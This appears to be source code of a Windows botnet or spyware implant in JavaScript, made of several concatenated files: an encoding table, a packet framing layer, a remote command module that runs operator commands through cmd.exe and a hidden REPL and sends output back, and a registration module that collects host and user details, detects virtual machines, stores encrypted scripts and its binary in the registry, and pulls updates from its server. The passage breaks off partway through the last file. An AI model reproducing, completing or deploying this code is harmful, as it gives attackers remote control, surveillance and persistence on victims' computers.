        "chars":  String.fromCharCode(1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 8224, 176, 1168, 163, 167, 8226, 182, 1030, 174, 169, 8482, 1026, 1106, 8800, 1027, 1107, 8734, 177, 8804, 8805, 1110, 181, 1169, 1032, 1028, 1108, 1031, 1111, 1033, 1113, 1034, 1114, 1112, 1029, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 1035, 1115, 1036, 1116, 1109, 8211, 8212, 8220, 8221, 8216, 8217, 247, 8222, 1038, 1118, 1039, 1119, 8470, 1025, 1105, 1103, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 164)
    },
    "koi8r": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(9472, 9474, 9484, 9488, 9492, 9496, 9500, 9508, 9516, 9524, 9532, 9600, 9604, 9608, 9612, 9616, 9617, 9618, 9619, 8992, 9632, 8729, 8730, 8776, 8804, 8805, 160, 8993, 176, 178, 183, 247, 9552, 9553, 9554, 1105, 9555, 9556, 9557, 9558, 9559, 9560, 9561, 9562, 9563, 9564, 9565, 9566, 9567, 9568, 9569, 1025, 9570, 9571, 9572, 9573, 9574, 9575, 9576, 9577, 9578, 9579, 9580, 169, 1102, 1072, 1073, 1094, 1076, 1077, 1092, 1075, 1093, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1103, 1088, 1089, 1090, 1091, 1078, 1074, 1100, 1099, 1079, 1096, 1101, 1097, 1095, 1098, 1070, 1040, 1041, 1062, 1044, 1045, 1060, 1043, 1061, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1071, 1056, 1057, 1058, 1059, 1046, 1042, 1068, 1067, 1047, 1064, 1069, 1065, 1063, 1066)
    },
    "koi8u": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(9472, 9474, 9484, 9488, 9492, 9496, 9500, 9508, 9516, 9524, 9532, 9600, 9604, 9608, 9612, 9616, 9617, 9618, 9619, 8992, 9632, 8729, 8730, 8776, 8804, 8805, 160, 8993, 176, 178, 183, 247, 9552, 9553, 9554, 1105, 1108, 9556, 1110, 1111, 9559, 9560, 9561, 9562, 9563, 1169, 9565, 9566, 9567, 9568, 9569, 1025, 1028, 9571, 1030, 1031, 9574, 9575, 9576, 9577, 9578, 1168, 9580, 169, 1102, 1072, 1073, 1094, 1076, 1077, 1092, 1075, 1093, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1103, 1088, 1089, 1090, 1091, 1078, 1074, 1100, 1099, 1079, 1096, 1101, 1097, 1095, 1098, 1070, 1040, 1041, 1062, 1044, 1045, 1060, 1043, 1061, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1071, 1056, 1057, 1058, 1059, 1046, 1042, 1068, 1067, 1047, 1064, 1069, 1065, 1063, 1066)
    }
}

var iconv = module.exports = {
    toEncoding: function(str, encoding) {
        return iconv.getCodec(encoding).toEncoding(str);
    },
    fromEncoding: function(buf, encoding) {
        return iconv.getCodec(encoding).fromEncoding(buf);
    },
    encodingExists: function(enc) {
        loadEncodings();
        enc = enc.replace(RE_SPACEDASH, "").toLowerCase();
        return (iconv.encodings[enc] !== undefined);
    },
    
    defaultCharUnicode: '�',
    defaultCharSingleByte: '?',

    encodingsLoaded: false,
    
    
    getCodec: function(encoding) {
        loadEncodings();
        var enc = encoding || "utf8";
        var codecOptions = undefined;
        while (1) {
            if (getType(enc) === "String")
                enc = enc.replace(RE_SPACEDASH, "").toLowerCase();
            var codec = iconv.encodings[enc];
            var type = getType(codec);
            if (type === "String") {
                
                codecOptions = {originalEncoding: enc};
                enc = codec;
            }
            else if (type === "Object" && codec.type != undefined) {
                
                codecOptions = codec;
                enc = codec.type;
            } 
            else if (type === "Function")
                
                return codec(codecOptions);
            else
                throw new Error("Encoding not recognized: '" + encoding + "' (searched as: '"+enc+"')");
        }
    },
    
    
    encodings: {
        internal: function(options) {
            return {
                toEncoding: toInternalEncoding,
                fromEncoding: fromInternalEncoding,
                options: options
            };
        },
        utf8: "internal",
        ucs2: "internal",
        binary: "internal",
        ascii: "internal",
        base64: "internal",
        
        
        singlebyte: function(options) {
            
            if (!options.charsBuf) {
                if (!options.chars || (options.chars.length !== 128 && options.chars.length !== 256))
                    throw new Error("Encoding '"+options.type+"' has incorrect 'chars' (must be of len 128 or 256)");
                
                if (options.chars.length === 128)
                    options.chars = asciiString + options.chars;

                options.charsBuf = new Buffer(options.chars, 'ucs2');
            }
            
            if (!options.revCharsBuf) {
                options.revCharsBuf = new Buffer(65536);
                var defChar = iconv.defaultCharSingleByte.charCodeAt(0);
                for (var i = 0; i < options.revCharsBuf.length; i++)
                    options.revCharsBuf[i] = defChar;
                for (var i = 0; i < options.chars.length; i++)
                    options.revCharsBuf[options.chars.charCodeAt(i)] = i;
            }

            return {
                toEncoding: toSingleByteEncoding,
                fromEncoding: fromSingleByteEncoding,
                options: options,
            };
        },

        
        table: function(options) {
            if (!options.table) {
                if (options.init) {
                    options.init.call(options);
                }
                if (!options.table) {
                    throw new Error("Encoding '" + options.type + "' has incorect 'table' option");
                }
            }
            if (!options.revCharsTable) {
                var revCharsTable = options.revCharsTable = {};
                for (var i = 0; i <= 0xFFFF; i++) {
                    revCharsTable[i] = 0;
                }

                var table = options.table;
                for (var key in table) {
                    revCharsTable[table[key]] = +key;
                }
            }
            
            return {
                toEncoding: toTableEncoding,
                fromEncoding: fromTableEncoding,
                options: options,
            };
        }
    }
};

function toInternalEncoding(str) {
    return new Buffer(ensureString(str), this.options.originalEncoding);
}

function fromInternalEncoding(buf) {
    return ensureBuffer(buf).toString(this.options.originalEncoding);
}

function toTableEncoding(str) {
    str = ensureString(str);
    var strLen = str.length;
    var revCharsTable = this.options.revCharsTable;
    var newBuf = new Buffer(strLen*2), gbkcode, unicode,
        defaultChar = revCharsTable[iconv.defaultCharUnicode.charCodeAt(0)];

    for (var i = 0, j = 0; i < strLen; i++) {
        unicode = str.charCodeAt(i);
        if (unicode >> 7) {
            gbkcode = revCharsTable[unicode] || defaultChar;
            newBuf[j++] = gbkcode >> 8; 
            newBuf[j++] = gbkcode & 0xFF; 
        } else {
            newBuf[j++] = unicode;
        }
    }
    return newBuf.slice(0, j);
}

function fromTableEncoding(buf) {
    buf = ensureBuffer(buf);
    var bufLen = buf.length;
    var table = this.options.table;
    var newBuf = new Buffer(bufLen*2), unicode, gbkcode,
        defaultChar = iconv.defaultCharUnicode.charCodeAt(0);

    for (var i = 0, j = 0; i < bufLen; i++, j+=2) {
        gbkcode = buf[i];
        if (gbkcode & 0x80) {
            gbkcode = (gbkcode << 8) + buf[++i];
            unicode = table[gbkcode] || defaultChar;
        } else {
            unicode = gbkcode;
        }
        newBuf[j] = unicode & 0xFF; 
        newBuf[j+1] = unicode >> 8; 
    }
    return newBuf.slice(0, j).toString('ucs2');
}

function toSingleByteEncoding(str) {
    str = ensureString(str);
    
    var buf = new Buffer(str.length);
    var revCharsBuf = this.options.revCharsBuf;
    for (var i = 0; i < str.length; i++)
        buf[i] = revCharsBuf[str.charCodeAt(i)];
    
    return buf;
}

function fromSingleByteEncoding(buf) {
    buf = ensureBuffer(buf);
    
    
    var charsBuf = this.options.charsBuf;
    var newBuf = new Buffer(buf.length*2);
    var idx1 = 0, idx2 = 0;
    for (var i = 0, _len = buf.length; i < _len; i++) {
        idx1 = buf[i]*2; idx2 = i*2;
        newBuf[idx2] = charsBuf[idx1];
        newBuf[idx2+1] = charsBuf[idx1+1];
    }
    return newBuf.toString('ucs2');
}


iconv.encode = iconv.toEncoding;
iconv.decode = iconv.fromEncoding;


function loadEncodings() {
    if (!iconv.encodingsLoaded) {
        [ singlebytejs
        ].forEach(function(encodings) {
            for (var key in encodings)
                iconv.encodings[key] = encodings[key]
        });
        iconv.encodingsLoaded = true;
    }
}




var asciiString = '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f'+
              ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f';

var ensureBuffer = function(buf) {
    buf = buf || new Buffer(0);
    return (buf instanceof Buffer) ? buf : new Buffer(""+buf, "binary");
}

var ensureString = function(str) {
    str = str || "";
    return (str instanceof Buffer) ? str.toString('utf8') : (""+str);
}

var getType = function(obj) {
    return Object.prototype.toString.call(obj).slice(8, -1);
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

========

var stream = require('stream');
var util = require('util');

var Transform = stream.Transform;

function modulo(a, b) {
		return a - Math.floor(a/b)*b;
}

function ToInteger(x) {
		x = Number(x);
		return x < 0 ? Math.ceil(x) : Math.floor(x);
}

function ToUint32(x) {
		return modulo(ToInteger(x), Math.pow(2, 32));
}

function PacketCompiler(options) {
	if (!(this instanceof PacketCompiler)) {
		return new PacketCompiler(options);
	}
	Transform.call(this, options);
	this._readableState.objectMode = true;
}

util.inherits(PacketCompiler, Transform);
/*
	
	*********************
	length 		- 4 bytes
	*********************
	payload
	*********************
*/

PacketCompiler.prototype._transform = function (chunk, enc, cb) {
	var self = this;

	//print('add protocol chunk : %d bytes', chunk.length);
	//console.log(chunk.toString());
	var packet = chunk;
	if (!(packet instanceof Buffer)) {
		packet = new Buffer(packet);
	}

	var packetLength = new Buffer(4);
	var packetMagic = new Buffer(4);
	var protoMagic = 0xEDB88320;
	var maxChunkSize = 1024;
	packetLength.writeUInt32BE(packet.length + 8);
	packetMagic.writeUInt32BE(ToUint32(protoMagic ^ packet.length));
	//process.encrypt(packet);
	//print(packetMagic.toString('hex'))

	self.push(packetLength);
	self.push(packetMagic);
	if (packet.length > maxChunkSize) {

		for (let i = 0; i < packet.length; i+=maxChunkSize)
		{
			self.push(
				packet.slice(i, Math.min(i + maxChunkSize, packet.length))
			);
		}

	} else {
		self.push(packet);
	}
	
	self.push(packetMagic);

	//print('send packet, length = %d bytes', packet.length);

	cb();

};

//------------------------------------------------------------
function createGetLengthMethod(lengthSize) {
	switch (lengthSize) {
		case 1:
			return function(buffer) {
				return buffer.readInt8(0)
			}
		case 2:
			return function(buffer) {
				return buffer.readInt16BE(0)
			}
		case 4:
			return function(buffer) {
				return buffer.readInt32BE(0)
			}
		default:
			throw new Error('Invalid frame length size')
	}
}

function PacketSplitter(options) {
	if (!(this instanceof PacketSplitter)) {
		return new PacketSplitter(options);
	}

	Transform.call(this, options);
	this._readableState.objectMode = true;
	
	this.opts = util._extend({
		lengthSize: 4,
		maxSize: 0,
		unbuffered: false
	}, options) 

	this.getLength = this.opts.getLength || 
		createGetLengthMethod(this.opts.lengthSize);

	this.buffer = null;
	this.frameLength = -1;
	this.framePos = 0; 

	
}

util.inherits(PacketSplitter, Transform);

PacketSplitter.prototype._transform = function (chunk, enc, cont) {
	while (chunk.length > 0) {
		var start = this.opts.lengthSize

		if (this.buffer) {
			chunk = Buffer.concat([this.buffer, chunk])
			this.buffer = null
		}

		if (this.frameLength < 0) {
			if (chunk.length < this.opts.lengthSize) {
				this.buffer = chunk
				return cont()
			}

			this.frameLength = this.getLength(chunk)

			if (this.frameLength < 0) {
				return cont(new Error('Message length is less than zero'))
			}

			// prevent denial-of-service attacks
			if (this.opts.maxSize > 0 && this.frameLength > this.opts.maxSize) {
				return cont(new Error('Message is larger than the allowed maximum of ' + this.opts.maxSize))
			}
		} else if (this.opts.unbuffered) {
			start = 0
		}

		var end = start + this.frameLength - this.framePos

		if (this.opts.unbuffered) {
			end = Math.min(end, chunk.length)
		} else if (chunk.length < end) {
			this.buffer = chunk
			return cont()
		}

		var buf = chunk.slice(start, end)

		buf.framePos = this.framePos
		buf.frameLength = this.frameLength

		this.framePos += end - start
		buf.frameEnd = this.framePos === this.frameLength

		if (buf.frameEnd) {
			this.frameLength = -1
			this.framePos = 0
		}

		//this.push(buf)
		{
			var packetCrc = buf.readUInt32BE();
			var packetPayload = buf.slice(4, buf.length - 4);

			if(packetCrc === buf.readUInt32BE(buf.length - 4)){
				this.emit('packet', new Buffer(packetPayload));
			}
		}
		
		if (chunk.length > end) {
			chunk = chunk.slice(end)
		} else {
			return cont()
		}
	}
};

exports.PacketCompiler = PacketCompiler;
exports.PacketSplitter = PacketSplitter;               

========

var fs = require('fs');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');

var MyPacketId;
var pingRequest = new Buffer([0x00]);
var pingReply = new Buffer([0x01]);

function buildPingPacket(data)
{
	var packet = new Buffer(data.length + 2);

	packet.writeUInt16BE(MyPacketId, 0);
	data.copy(packet, 2);

	return packet;
}


function OnPingPacket(outstream, data)
{
	
	outstream.sendProtocolPacket(
		MyPacketId, pingReply);
}

exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	

	MyPacketId = prtocolId;


	packetParsers[prtocolId] = OnPingPacket;
	procolPacketBuilders[prtocolId] = buildPingPacket;
}                                                                                              

========

var fs = require('fs');
var path = require('path');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var suspend = require('suspend');
var iconv = require('inconvlite');
var Stream = require('stream').Stream;
var repl = require('repl');
var protobuf = require('protocol_buffers');

var spyware = process.binding("spyware");
var reg = process.binding("registry");

var consoleTerminal = undefined;


var messages = protobuf([
  'message CommandExecutionRequest {\r',
    '\toptional string process = 1;\r',
    '\toptional string command = 2;\r',
  '}\r'
].join('\n'));

const SP_EXECUTECMD = 1;
const SP_EXECUTREPL = 2;

var MyPacketId;
var ReplCookie;


function createReplStream(socket) {
    var stream = new Stream();

    stream.readable = true;
    stream.resume = function () { };
    stream.write = function (data) {};

    return stream;
};


function getTerminalDefaultEncoding() {
    var x = new reg.WindowsRegistry(HKEY_LOCAL_MACHINE, 
    	'SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\',
    	KEY_READ, true);

    var valueType = x.GetDataType("OEMCP");

    if (valueType == REG_SZ) {
        return x.ReadString("OEMCP");
    }
}

function BuildPacket(requestId, status, data)
{
	var packet;

	if(data){
		packet = new Buffer(
			2  +
			4  +
			1  +
			data.length
		);
	}
	else
	{
		packet = new Buffer(
			2  +
			4  +
			1 
		);
	}
	
	packet.writeUInt16BE(MyPacketId, 0);
	packet.writeUInt32BE(requestId, 2);
	packet.writeUInt8(status, 6);

	if(data)
		data.copy(packet, 7);

	return packet;
}

var OnPacket = suspend(function*(outstream, data) 
{
	
	var func = data.readUInt8();
	var requestId = data.readUInt32BE(1);

	
	
	

	
	{
		switch(func)
		{
			case SP_EXECUTECMD :
				var command = messages.CommandExecutionRequest.decode(data.slice(5));
				var commandForExecute = command.command;
				
				
				

				if(command.process === process.currentBinary){
				    if (typeof (consoleTerminal) == 'undefined') {
				        consoleTerminal = require('child_process').spawn('cmd');
				        consoleTerminal.encoding = getTerminalDefaultEncoding();

				        if (consoleTerminal.encoding) {
				            consoleTerminal.encoding = 'cp' + consoleTerminal.encoding;
				        }

				        consoleTerminal.stdout.on('data', function (data) {
				            var dataForSend = new Buffer(iconv.decode(data, consoleTerminal.encoding));
				            outstream.sendProtocolPacket(
                                MyPacketId, requestId, 0x00, dataForSend);
				        });

				        consoleTerminal.stderr.on('data', function (data) {
				            var dataForSend = new Buffer(iconv.decode(data, consoleTerminal.encoding));
						
				            outstream.sendProtocolPacket(
                                MyPacketId, requestId, 0x00, dataForSend);
				        });

				        consoleTerminal.on('close', function(){
				            consoleTerminal = undefined;
				        })
				    }

				    if(consoleTerminal)
				        consoleTerminal.stdin.write(
                            iconv.encode(commandForExecute, consoleTerminal.encoding));
				}
				else
				{
				    if(process.slaveServer)
    				    process.slaveServer.broadcastProtocolPacket(
                            MyPacketId, data);
				}

				break;
			case SP_EXECUTREPL :
				
			    var command = messages.CommandExecutionRequest.decode(data.slice(5));
			    if(command.process === process.currentBinary){
			        var commandForExecute = command.command;

			        if(ReplCookie !== requestId)
			        {
			            ReplCookie = requestId;

			            process.g_ReplStream.write = function (stdout_data) {
			                outstream.sendProtocolPacket(
                                MyPacketId, requestId, 0x00, new Buffer(stdout_data));
			            };
			        }
			    
			        process.g_ReplStream.emit('data', commandForExecute);
			    }
			    else
			    {
			        if(!util.isUndefined(process.slaveServer)){
			            process.slaveServer.broadcastProtocolPacket(
                            MyPacketId, data);
			        }
			    }
				break;
			default:
				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0xFF);
				break;	
		}

	}

});

exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	

	MyPacketId = prtocolId;


	packetParsers[prtocolId] = OnPacket;
	procolPacketBuilders[prtocolId] = BuildPacket;
	process.g_ReplStream = createReplStream();

	process.g_replInstance = repl.start({
	    prompt: "bot::debug > ",
	    input: process.g_ReplStream,
	    output: process.g_ReplStream,
	    useGlobal: true
	});

	process.g_replInstance.context.printf = function () {
        var s = util.format.apply(this, arguments) + '\n';
        process.g_ReplStream.write(s);
    }
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

========

var fs = require('fs');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var os = require('os');
var suspend = require('suspend'), resume = suspend.resume;
var reg = process.binding("registry");
var vmx_detection = require("vmx_detection");
var MersenneTwister = require('utils').MersenneTwister;
var spyware = require('spyware');
var protobuf = require('protocol_buffers')

var messages = protobuf([
  'message AdapterAddress {\r',
  '    optional string address = 1;\r',
  '    optional string netmask = 2;\r',
  '    optional string family = 3;\r',
  '    optional string mac = 4;\r',
  '    optional int32 scopeid = 5;\r',
  '    optional bool internal = 6;\r',
  '}\r',
  '\r',
  'message NetworkInterface {\r',
  '    optional string connectionName = 1;\r',
  '    repeated AdapterAddress adresses = 2;\r',
  '}\r',
  '\r',
  'message NetworkInterfaces {\r',
  '    repeated NetworkInterface Interfaces = 1;\r',
  '}\r',
  '\r',
  'message Processor {\r',
  '    optional string model = 1;\r',
  '    optional int32 speed = 2;\r',
  '}\r',
  '\r',
  'message Bot {\r',
  '    optional string processName = 1;\r',
  '    optional string guid = 2;\r',
  '    optional string vendor = 3;\r',
  '    optional string os = 4;\r',
  '    optional string ie = 5;\r',
  '    optional string ver = 6;\r',
  '    optional int32  uptime = 7;\r',
  '    optional int32  upspeed = 8;\r',
  '    optional string internalAddress = 9;\r',
  '    optional string HomePath = 10;\r',
  '    optional string ComputerName = 11;\r',
  '    optional string SystemDrive = 12;\r',
  '    optional string SystemRoot = 13;\r',
  '    optional string UserDomain = 14;\r',
  '    optional string UserName = 15;\r',
  '    optional string UserProfile = 16;\r',
  '    optional string LogonServer = 17;\r',
  '    optional int64  freemem = 18;\r',
  '    optional int64  totalmem = 19;\r',
  '    optional NetworkInterfaces networkInterfaces = 20;\r',
  '    optional string tmpdir = 21;\r',
  '    repeated Processor cpus = 22;\r',
  '    optional string hostname = 23;\r',
  '    optional bool IsVirtualMachine = 24;\r',
  '}\r',
  '\r',
  'message Tasks {\r',
  '\r',
  '    message Settings {\r',
  '        optional int32  pingTime = 1;\r',
  '    }\r',
  '    \r',
  '    optional Settings  settings = 1;\r',
  '    optional bytes     slch = 2;\r',
  '    optional bytes     rbody32_hash = 3;\r',
  '    optional bytes     rbody64_hash = 4;\r',
  '    optional bytes     defaultjs_hash = 5;\r',
  '}',
  'message BodyUpdate {',
  '  optional int32 platform = 1;',
  '  optional bytes newbody = 2;',
  '}'

].join('\n'));

var MyPacketId;

function RegReadObject(keyname) {
	var x = new reg.WindowsRegistry(
		process.g_malwareRegistryHive,
		process.g_malwareRegistryPath, KEY_READ, true
	);
	var valueType = x.GetDataType(keyname);
	if (valueType == REG_BINARY) {
		return x.ReadBuffer(keyname);
	}
	else if (valueType == REG_SZ) {
		return x.ReadString(keyname);
	}
	else if (valueType == REG_DWORD) {
		return x.ReadDword(keyname);
	}
}

function RegWriteObject(keyname, obj) {
	var x = new reg.WindowsRegistry(
		process.g_malwareRegistryHive,
		process.g_malwareRegistryPath, KEY_WRITE, true
	);

	if (Buffer.isBuffer(obj)) {
		return x.WriteBuffer(keyname, obj);
	}
	else if (typeof obj == "string") {
		return x.WriteString(keyname, obj);
	}
	else return -1;
}

process.SpSaveDefault = function (config) {
	var encryptedcfg = new Buffer(config);
	encryptedcfg.encryptDecrypt()

	RegWriteObject(
		process.g_SpDefaultKey,
		encryptedcfg
	);
}

process.SpLoadDefault = function () {
	try {
		process.g_defaultJs = '';
		var readedBuffer = RegReadObject(process.g_SpDefaultKey);

		if (typeof (readedBuffer) !== 'undefined') {
			readedBuffer.encryptDecrypt();
			process.g_defaultJs = readedBuffer.toString();
		}
	}
	catch (e) {

	}
}

process.SpSavePrivate = function (config) {
	var encryptedcfg = new Buffer(config);
	encryptedcfg.encryptDecrypt()

	RegWriteObject(
		process.g_SpPrivateKey,
		encryptedcfg
	);
}


process.SpLoadPrivate = function () {
	try {
		process.g_privateScript = '';
		var readedBuffer = RegReadObject(process.g_SpPrivateKey);

		if (typeof (readedBuffer) !== 'undefined') {
			readedBuffer.encryptDecrypt();
			process.g_privateScript = readedBuffer.toString();
		}
	}
	catch (e) {

	}
}

process.RegReadObject = RegReadObject;
process.RegWriteObject = RegWriteObject;

process.RegReadObjectEncrypted = function(keyname){
	try{
		var readedBuffer = RegReadObject(keyname);
	
		if (typeof (readedBuffer) !== 'undefined') {
			readedBuffer.encryptDecrypt();
			return JSON.parse(readedBuffer.toString());
		}
	}catch(e){

	}
}

process.RegWriteObjectEncrypted = function(keyname, obj){
	try{
		var objstr = JSON.stringify(obj);
		var encryptedcfg = new Buffer(objstr);
		encryptedcfg.encryptDecrypt();
		return RegWriteObject(keyname, encryptedcfg);
	}catch(e){

	}
}


process.FsReadObjectEncrypted = function(keyname){
    try{
        var readedBuffer = fs.readFileSync(os.tmpdir() + '\\' + keyname);
	
        if (typeof (readedBuffer) !== 'undefined') {
            readedBuffer.encryptDecrypt();
            return JSON.parse(readedBuffer.toString());
        }
    }catch(e){

    }

}

process.FsWriteObjectEncrypted = function(keyname, obj){
    try{
        var objstr = JSON.stringify(obj);
        var encryptedcfg = new Buffer(objstr);
        encryptedcfg.encryptDecrypt();
        fs.writeFileSync(os.tmpdir() + '\\' + keyname, encryptedcfg);
        return true;
    }catch(e){

    }

    return false;
}

function getAdapters(adapters){
	var interfaces = os.networkInterfaces();
	var outobj = [];

	for(let i in interfaces){
		outobj.push({
			connectionName : i,
			adresses : interfaces[i]
		}); break;
	}
	return {Interfaces : outobj}
}

process.GetMachineGuid = function(cb) {
	

	var seed = (
		os.arch() +
		os.hostname() +
		os.cpus()[0].model +
		os.hardDriveId()
	).hashCode();

	var rgen = new MersenneTwister(seed);

	var uuid = '4xxxyxxxxxxxxxxxxxxx'.replace(/[xy]/g, function (c) {
		var r = rgen.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
		return v.toString(16);
	});

	process.machineGuid = os.hostname() + '_' + uuid;

	if(cb)cb(os.hostname() + '_' + uuid);

	return os.hostname() + '_' + uuid;
}

function getIeVersion() {
	
	try {
		var x = new reg.WindowsRegistry(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer", KEY_QUERY_VALUE, true);
		return x.ReadString("Version");
	}
	catch (e) {
		return "undefined";
	}
}

function GenerateBotInfo(){
	
	

	process.GetMachineGuid();

	

	process.bot = {
		'processName': process.execPath,
		'guid': process.machineGuid,
		'vendor': process.g_vendorName,
		'os': util.format("%s %s (%s)", os.type(), os.release(), os.arch()),
		'ie': getIeVersion(),
		'ver': util.format("%s.%s", process.version, process.g_botId),
		'handler': '/registrator',
		'uptime': os.uptime(),
		'upspeed': 0,
		'internalAddress': process.externalAddress,
		'HomePath': process.env['HOMEPATH'],
		'ComputerName': process.env['COMPUTERNAME'],
		'SystemDrive': process.env['SystemDrive'],
		'SystemRoot': process.env['SystemRoot'],
		'UserDomain': process.env['USERDOMAIN'],
		'UserName': process.env['USERNAME'],
		'UserProfile': process.env['USERPROFILE'],
		'LogonServer': process.env['LOGONSERVER'],
		'freemem': os.freemem(),
		'totalmem': os.totalmem(),
		'networkInterfaces': getAdapters(),
		'tmpdir': os.tmpDir(),
		'cpus': process.cpus,
		'hostname': os.hostname(),
		'IsVirtualMachine' : vmx_detection.IsVirtualMachine()
	}
	
	return messages.Bot.encode(process.bot);
}

function buildPacket(data)
{
	var packet = new Buffer(data.length + 2);

	packet.writeUInt16BE(MyPacketId, 0);
	data.copy(packet, 2);

	return packet;
}



function RegReadBodyFromRegistry(platform) {
	if (process.g_malwareRegistryHive === HKEY_LOCAL_MACHINE) {
		return RegReadObject("binaryImage" + platform);
	} else {
		var buffers = [];
		for (var i = 0; ; i++) {
			var buffer = RegReadObject(util.format("binaryImage%d_%d", platform, i));

			if (typeof (buffer) === 'undefined') {
				break;
			} else {
				buffers.push(buffer);
			}
		}
		if (buffers.length > 0) {
			var result = Buffer.concat(buffers);
			return result;
		} else {
			
		}
	}
}


process.getLocalBinaryImageHash = function (platform) {
	try {
		var hash = process.md5(RegReadBodyFromRegistry(platform));
		return hash;
	} catch (e) {
		return null;
	}
}

function RemoveOldBinaryBody(platform) {

	var x = new reg.WindowsRegistry(
		process.g_malwareRegistryHive,
		process.g_malwareBodyRegistryPath,
		KEY_ALL_ACCESS
	);

	x.DeleteKeyValue("", util.format('binaryImage%d', platform));
	for (var i = 0; i < 20; i++) {
		x.DeleteKeyValue("", util.format('binaryImage%d_%d', platform, i));
	}
}

function RegWriteBodyPart(keyname, obj, hive) {
	var x = new reg.WindowsRegistry(
		(hive ? hive : process.g_malwareRegistryHive),
		(hive ? "SOFTWARE\\cxsw" : process.g_malwareBodyRegistryPath),
		KEY_WRITE, 
		true
	);

	if (Buffer.isBuffer(obj)) {
		return x.WriteBuffer(keyname, obj);
	}
	else if (typeof obj == "string") {
		return x.WriteString(keyname, obj);
	}
	else return -1;
}


function RegSaveBodyIntoRegistry(platform, data) {

	if(process.currentBinary === 'services.exe')
	{
		
		process.saveBinaryBody(data, platform);
		
	}
	else
	{
		RemoveOldBinaryBody(platform);

		var MaximumRegistryValueSize = (1014 * 512);
		var PartsCount = (AlignUp(data.length, MaximumRegistryValueSize) / MaximumRegistryValueSize);
		var SpaceLeft = data.length;

		for (var i = 0; i < PartsCount; i++, SpaceLeft -= MaximumRegistryValueSize) {
			if (SpaceLeft > 0) {
				var dataBuffer = new Buffer(min(SpaceLeft, MaximumRegistryValueSize));
				var valueName = util.format("binaryImage%d_%d", platform, i);
				//buf.copy(targetBuffer, [targetStart], [sourceStart], [sourceEnd])
				data.copy(
					dataBuffer, 0,
					(i * MaximumRegistryValueSize),
					(i * MaximumRegistryValueSize) + min(SpaceLeft, MaximumRegistryValueSize));

				/*print("RegSetValueBinary asked for save %d bytes in %d\\%s\\%s", 
					dataBuffer.length, 
					process.g_malwareRegistryHive,
					process.g_malwareBodyRegistryPath,
					valueName
				);
				*/
				RegWriteBodyPart(valueName, dataBuffer);
			}
		}
	}
}

var restartMainBody = suspend(function*(data, platform){

	//print("%s : called restartMainBody for %s", process.execPath, platform);
	yield sleep(5000, resume());
	if (process.arch.match(/\d+/g)[0] === platform.toString()){
	    //process.restartBody(data); /* restartBody depricated */
	}
});

function saveBinaryImageToRegistry(data, platform) {

	if(
		(process.currentBinary !== 'explorer.exe') && 
		(process.currentBinary !== 'services.exe')
	)
	{
		return true;
	}

	if (!util.isUndefined(data)) 
	{
		RegSaveBodyIntoRegistry(platform, data);
		return true;
	}

	return false;
}

const PACKET_REGISTRATION_REQUEST = 0x00;
const PACKET_TASKS = 0x01;
const PACKET_PRIVATE_SCRIPT = 0x02;
const PACKET_DEFAULT_SCRIPT = 0x03;
const PACKET_BODYPDATE = 0x04;

process.doUpdateBody = suspend(function*(packet)
{
	//print('%s : bodyupdate got', process.execPath);

    if(process.isUpdatePending){
        return;
    }

    process.isUpdatePending = true;

	var update = messages.BodyUpdate.decode(packet);

	//print('update for platform %d', update.platform);
	

	if(!util.isUndefined(process.slaveServer))
	{
	    //main process here.


	    update.newbody = yield process.downloadUpdate(process.currentServer, resume());
	    
	    //print('update.newbody : ', update.newbody.length);

	    var updatePacket = messages.BodyUpdate.encode(packet);

		//print('broadcastind update');
		yield process.slaveServer.broadcastProtocolPacket(
			SLAVE_PACKET_UPDATE, 
			updatePacket, 
			resume());
		yield sleep(5000, resume());
		//print('broadcastind update -> done');
	}

	if(saveBinaryImageToRegistry(
		update.newbody, 
		update.platform.toString()) === true){
		//print('buffer saved, try to update core');
		if (process.arch.match(/\d+/g)[0] === update.platform.toString()) {
			//print('%s : Update core process', process.g_mainProcess);

			restartMainBody(update.newbody, update.platform);
		}
		else
		{
			//print('sorry... no platform here');
		}
	} 
    
	process.isUpdatePending = false;
});

function OnPacket(outstream, data)
{
	if (data[0] === PACKET_REGISTRATION_REQUEST) // request reg
	{
		//print('server want registration info!');
		outstream.sendProtocolPacket(
			MyPacketId, GenerateBotInfo());
	}
	else if(data[0] === PACKET_TASKS)
	{
		//print('got tasks');
		var tasks = messages.Tasks.decode(data.slice(1));
		
		process.defaultPingTimerValue = tasks.settings.pingTime;

		//print(JSON.stringify(tasks, undefined, 2));
	}
	else if (data[0] === PACKET_PRIVATE_SCRIPT)
	{
		//print('got private script');
		var ps = data.slice(1).toString();
